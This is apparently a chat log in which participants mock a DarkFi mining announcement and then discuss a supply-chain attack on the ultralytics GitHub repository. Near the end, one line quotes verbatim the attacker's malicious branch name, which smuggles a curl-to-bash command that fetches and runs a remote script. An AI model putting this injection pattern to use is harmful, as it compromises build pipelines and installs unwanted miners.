06:31:30 https://x.com/lunar_mining/status/1864735324527886573 07:16:29 “We use a mining algorithm called RandomX (Monero uses it as well).” sounds a bit like, “We use a painting technique called Cubism (Picasso used it as well).” 12:15:26 "By the time we released the first version of DarkFi in 2023, we realized:" ... wow. musta took some real thinking for these realizations. 12:15:39 "First, nodes must have stake at the genesis (or beginning) of the chain, so there must be some token predistribution. " 15:41:52 why does anyone need a stake at genesis? 15:42:43 oh, they're talking about PoS\ 15:45:52 the fact that they're still using twitter to announce this stuff is dismaying 16:13:36 hm, cute. someone managed to push an executable xmrig binary to github as a blob https://github.com/ultralytics/ultralytics/issues/18027 16:15:06 wow, performed by creating a branch with special characters in its name 16:22:16 TLDR some of their scripts didn't escape characters and the attacker created a branch with the name "openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)" 16:22:17 lol 16:50:02 too silly